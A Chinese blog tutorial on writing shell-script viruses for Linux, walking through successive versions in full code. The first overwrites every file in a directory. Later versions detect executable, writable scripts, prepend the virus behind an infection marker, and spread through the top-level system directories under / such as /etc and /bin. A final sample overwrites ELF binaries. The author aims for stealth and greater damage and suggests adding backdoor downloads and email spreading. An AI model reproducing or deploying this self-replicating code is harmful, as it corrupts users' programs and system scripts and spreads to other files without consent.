病毒研究之感染linux脚本 

   对于shell编程的程序员来说所谓的shell病毒技术就是小牛一毛而已,看完本文后你就会有所体会但,简单归简单,我们还是要去了解它,呵呵. 
主要的shell病毒技术 
------------------- 
当然,本文需要你至少了解linux shell编程的基础知识和病毒知识. 
我们来看一个最原始的shell病毒,代码最能说明问题: 
代码: 
#shellvirus I 
for file in * 
do 
   cp $0 $file 
done 
简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件.但是,我们知道linux是多用户的操作系统,它的文件是具有保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染.所以我们可以为该脚本做个判断,这样隐蔽性就大大增强了: 
代码: 
#shellvirus II 
for file in * 
  do 
    if test -f $file 
    then 
     if test -x $file 
     then 
      if test -w $file 
      then 
       if grep -s echo $file >.mmm 
       then 
       cp $0 $file 
  fi; fi; fi; fi; fi 
done 
rm .mmm -f 
我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序。如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的. 
if grep -s echo $file>/.mmm 
这句也可以这样写: 
if file $file | grep -s 'Bourne shell script' > /dev/nul ; 
then,也就是判断file是否为shell脚本程序. 
但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错, 
看看下面代码: 
#infection 
head -n 24 $0 > .test        <-取自身保存到.test 
  for file in *            <-遍历文件系统 
  do 
   if test -f $file        <-判断是否为文件 
   then 
       if test -x $file        <-判断文件是否可执行 
       then 
            if test -w $file    <-判断文件是否可写 
            then 
              if grep -s echo $file >.mmm    <-判断是否为脚本程序 
              then 
                head -n 1 $file >.mm        <-提取要感染的脚本程序的第一行 
                if grep -s infection .mm >.mmm    <-判断该文件是否已经被感染 
   
                then 
                 rm -f .mm            <-已经被感染,则跳过 
                else                <-还未被感染 
                 cat $file > .SAVEE        <-很熟悉吧?借用了传统的二进制文件的感染机制 
                 cat .test > $file 
                 cat .SAVEE >> $file 
   fi; fi; fi; fi; fi 
done 
rm .test .SAVEE .mmm .mm -f 
程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵.不过危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来. 
为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码: 
代码: 
#infection 
for file in * ;  do 
   if test -f $file && test -x $file && test -w $file ; then 
    if grep -s echo $file > /dev/nul ; then 
     head -n 1 $file >.mm 
      if grep -s infection .mm > /dev/nul ; then 
       rm .mm -f ; else 
        cat $file > .SAVEE 
        head -n 13 $0 > $file 
        cat .SAVEE >> $file 
  fi; fi; fi 
done 
rm .SAVEE .mm -f 
现在只有两个临时文件的产生了,代码也被精简到了13行.当然可以完全用;来把代码甚至写到1-2行,但这里我只是说明问题,就不写出来了. 
好,我们看看,shell病毒还能做哪些有用的事情,有可能我们想感染别的目录的文件,比如根目录或者是/etc,/bin等等,因为大多数有用的系统配置脚本都存放在那些目录下,只要对上述代码稍作改动就可以实现了 
代码: 
#infection 
xtemp=$pwd                <-保存当前路径 
head -n 22 $0 > /.test 
for dir in /* ; do            <-遍历/目录 
  if test -d $dir ; then        <-如果是目录就cd该目录 
   cd $dir 
   for file in * ; do            <-遍历该目录文件 
    if test -f $file && test -x $file && test -w $file ; then    <-确定文件是否可执行,可写 
     if grep -s echo $file > /dev/nul ; then            <-确定是否为脚本程序   
       head -n 1 $file > .mm 
       if grep -s infection .mm > /dev/nul ; then        <-确定是否已经被感染 
   
        rm .mm -f ; else 
         cat $file > /.SAVEE                <-和前面的感染机制一样感染未被感染的脚本程序 
         cat /.test > $file 
         cat /.SAVEE >> $file 
    fi; fi; fi 
   done 
   cd .. 
  fi 
done 
cd $xtemp        <-返回原目录 
rm /.test /.SAVEE .mm -f 
    其实这段代码只感染了/目录下的一层目录.当然我们可以使它感染的更深,只是加几个循环而已.同样shell病毒可以做很多事情如download后门程序,为机器自动开后门,主动去***联网的其他机器,取用户的email来发送传染等等.总之它的实现技术不高深, 但也比较实用,还是值得去说明一下的,呵呵. 
    同样,我们也可以感染elf文件,但危害性很小,这里不重点讲,给个例程大家理解一下吧 
代码: 
for file in * ;  do 
   if test -f $file && test -x $file && test -w $file ; then 
    if file $file | grep -s 'ELF' > /dev/nul ; then 
     mv $file .$file 
     head -n 9 $0 > $file 
  fi; fi 
done 
$0

转载于:https://blog.51cto.com/coolface/765600

病毒研究之感染linux脚本相关推荐

  1. linux版本wannacry,WannaCry 勒索病毒也能感染 Linux

    原标题:WannaCry 勒索病毒也能感染 Linux WannaCry 已升级到 2.0 版,与之前版本的不同是,这个变种取消了 Kill Switch,不能通过注册某个域名来关闭变种勒索病毒的传播 ...

  2. Linux病毒研究与分析

    前言: 在我们日常生活中早就对windows中的病毒习惯了,对付windows中的病毒.我们有很多办法:杀毒软件.专杀工具等,但是这些东西往往主要集中在windows这一领域. 随着网络的发展,很多企 ...

  3. 港科夜闻|香港科大新研究显示预期接种疫苗和加强针后产生的T细胞免疫屏障将能继续保护人体并减少被Omicron等病毒变异的感染机率...

    关注并星标 每周阅读港科夜闻 建立新视野 开启新思维 1.香港科大新研究显示预期接种疫苗和加强针后产生的T细胞免疫屏障将能继续保护人体并减少被Omicron等病毒变异的感染机率.透过接种新冠疫苗或经感 ...

  4. 【应急类漏洞】WatchDogsMiner挖矿蠕虫大量感染Linux服务器

    近日,深信服安全团队追踪到公有云上及外部Linux服务器存在大量被入侵,表现为/tmp临时目录存在watchdogs文件,出现了crontab任务异常.网络异常.系统文件被删除.CPU异常卡顿等情况, ...

  5. 一种文件捆绑型病毒研究

    一种文件捆绑型病毒研究 宁 轲 (广西职业技术学院 广西 南宁 530226) 摘 要: 文件捆绑型计算机病毒具有隐蔽性高.传播速度快和破坏力强等特点,早些年出现的威金病毒和熊猫烧香病毒都属于文件捆绑 ...

  6. Linux脚本:Bash脚本看这一篇就够了

    前言 Linux脚本有很多解析器(Shell),不同解析器要求的脚本语法是不一样的.系统在解析脚本时,如果没有在脚本声明指定解析器,则会采用系统默认解析器来对脚本进行解析.sh是非常重要解析器,历史很 ...

  7. linux 脚本判断一个目录不存在

    linux 脚本判断一个目录不存在 1 2 3 4 #!/bin/sh if [ ! -d /mnt/u ]; then mkdir -p /mnt/u fi 本文转自 boy461205160 51 ...

  8. 将Linux脚本中的正常输出,警告,错误等信息输出到文件中

    将Linux脚本中的正常输出,警告,错误等信息输出到文件中 转载于:https://www.cnblogs.com/lwmp/p/7700339.html

  9. 国内元老级病毒研究论坛发文号召会员抵制瑞星产品

    近日,国内元老级病毒研究论坛 CVC电脑病毒论坛 的管理员Vancheer发表声明,号召会员抵制瑞星产品. CVC电脑病毒论坛是国内最早的病毒研究论坛,可以说是国内水平最高资格最老的病毒研究论坛,其成 ...

最新文章

  1. 全球机器学习领域顶尖的16家公司
  2. golang new make 区别
  3. Android 文件布局一些细节备忘
  4. 基于RBAC的设计思路
  5. case when用法java,sql之case when用法详解
  6. 标志寄存器:CF、PF、AF、ZF、SF、TF、DF、OF
  7. C++:_ASSERTE(__acrt_first_block == header)
  8. java怎么将图片文件转流并在jsp前端显示_jsp已经被淘汰了吗?
  9. XSS-Game level 5
  10. openfire User Service 和删除分组的方法
  11. CString和string的互相转换
  12. OpenCV IPLImage常用方法
  13. mac桌面存在顽固文件无法删除?怎么办?
  14. 指环王解析_回到指环王
  15. 阿里平头哥首次交货——玄铁910是个啥?是芯片吗?
  16. SAP License:ERP系统实施价格是多少?
  17. 27个懒人正规快速赚钱项目
  18. 微信小程序授权登录 组件的封装
  19. Java程序员从笨鸟到菜鸟之(序言)+全部链接
  20. 基于ADC电压采集的锂电池电量显示方法

热门文章

  1. 查询表结构用于导出excel
  2. 当页面有多个js文件时,应如何引入?
  3. Siverlight去掉ToolTip的白色边框
  4. linux的特殊权限SUID、SGID和SBIT
  5. BC30138: 无法在路径“C:\WINDOWS\TEMP\”中创建临时文件: 拒绝访问。
  6. Linux数据文件自动迁移,linux下增加磁盘改变指定文件路径分区挂载点和迁移数据...
  7. 保护模式下寻址(易懂)
  8. android LayoutInflater.inflate()的参数及其用法
  9. JS一起学05:Date对象、封闭空间、函数传参和封装、获取非行间样式、字符串操作
  10. 风口摔死的飞猪:致那些“消失”的互联网创业项目